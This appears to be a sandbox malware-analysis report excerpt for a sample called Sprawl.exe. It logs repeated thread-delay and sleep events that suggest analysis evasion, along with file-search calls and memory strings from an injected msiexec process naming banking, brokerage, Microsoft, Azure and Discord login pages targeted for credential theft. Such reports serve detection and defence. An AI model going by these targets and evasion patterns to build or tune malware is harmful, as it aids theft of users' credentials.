            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599890
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599781
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599672
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599562
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599452
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599282
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599109
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598905
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598765
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598647
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598531
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598421
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598305
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598187
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598078
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597968
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597859
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597748
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597625
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597515
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597406
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597297
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597187
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597078
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596968
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596859
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596750
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596640
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596504
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596375
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596261
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596132
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596011
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595754
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595640
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595530
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595406
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595297
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595187
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595078
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594968
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594859
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594718
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594609
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594499
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594390
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594265
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594156
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594031
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 593922
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599874
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599765
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599648
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599546
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599437
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599328
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599218
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599108
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598999
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598890
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598781
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598671
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598562
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598453
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598343
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598234
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598125
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598015
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597905
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597796
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597628
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597476
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597374
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 597101
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596984
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596874
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596765
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596656
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596546
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596437
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596328
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596218
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596109
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 596000
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595890
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595781
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595672
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595562
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595453
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595343
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595234
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595125
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 595015
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594906
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594797
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594672
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594562
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594453
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594343
            Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 594234
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3234
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6559
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8355
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1184
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | API coverage: 4.8 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3648 | Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 672 | Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep count: 32 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -29514790517935264s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1056 | Thread sleep count: 6658 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1056 | Thread sleep count: 3177 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -599890s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -599781s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -599672s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -599562s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -599452s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -599282s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -599109s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -598905s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -598765s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -598647s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -598531s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -598421s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -598305s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -598187s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -598078s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -597968s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -597859s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -597748s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -597625s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -597515s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -597406s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -597297s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -597187s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -597078s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -596968s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -596859s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -596750s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -596640s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -596504s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -596375s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -596261s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -596132s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -596011s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -595754s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -595640s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -595530s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -595406s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -595297s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -595187s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -595078s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -594968s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -594859s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -594718s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -594609s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -594499s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -594390s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -594265s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -594156s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -594031s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640 | Thread sleep time: -593922s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep count: 31 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -28592453314249787s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6880 | Thread sleep count: 2558 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -599874s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -599765s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -599648s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -599546s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6880 | Thread sleep count: 7290 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -599437s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -599328s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -599218s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -599108s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -598999s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -598890s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -598781s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -598671s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -598562s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -598453s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -598343s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -598234s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -598125s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -598015s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -597905s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -597796s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -597628s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -597476s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -597374s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -597101s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -596984s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -596874s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -596765s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -596656s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -596546s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -596437s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -596328s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -596218s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -596109s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -596000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -595890s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -595781s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -595672s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -595562s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -595453s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -595343s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -595234s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -595125s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -595015s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -594906s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -594797s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -594672s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -594562s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -594453s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -594343s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104 | Thread sleep time: -594234s >= -30000s
            Source: C:\Users\user\Desktop\Sprawl.exe | File Volume queried: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian FullSizeInformation
            Source: C:\Users\user\Desktop\Sprawl.exe | Code function: 0_2_00406033 FindFirstFileA,FindClose
            Source: C:\Users\user\Desktop\Sprawl.exe | Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Users\user\Desktop\Sprawl.exe | Code function: 0_2_00402688 FindFirstFileA
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597905Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597628Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597476Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597101Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596874Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594797Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594234Jump to behavior
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3363263711.000000000704A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: msiexec.exe, 00000008.00000002.3362918549.00000000065D8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3362918549.000000000657A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3363263711.00000000070A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: msiexec.exe, 00000009.00000002.3382107427.0000000023BC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
